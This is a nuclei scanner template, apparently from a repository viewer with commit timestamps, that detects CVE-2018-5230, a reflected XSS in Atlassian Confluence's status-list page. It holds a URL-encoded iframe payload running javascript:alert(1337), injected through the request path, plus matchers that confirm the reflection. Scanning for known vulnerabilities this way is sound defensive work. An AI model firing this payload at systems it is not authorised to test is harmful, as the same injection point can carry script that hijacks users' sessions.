nuclei-templates/cves/CVE-2018-5230.yaml

20 lines
412 B
YAML
Raw Normal View History

id: CVE-2018-5230
info:
name: Atlassian Confluence Status-List XSS
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm"
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
- type: word
words:
2020-05-25 07:49:06 +00:00
- "javascript:alert(1337)"
part: body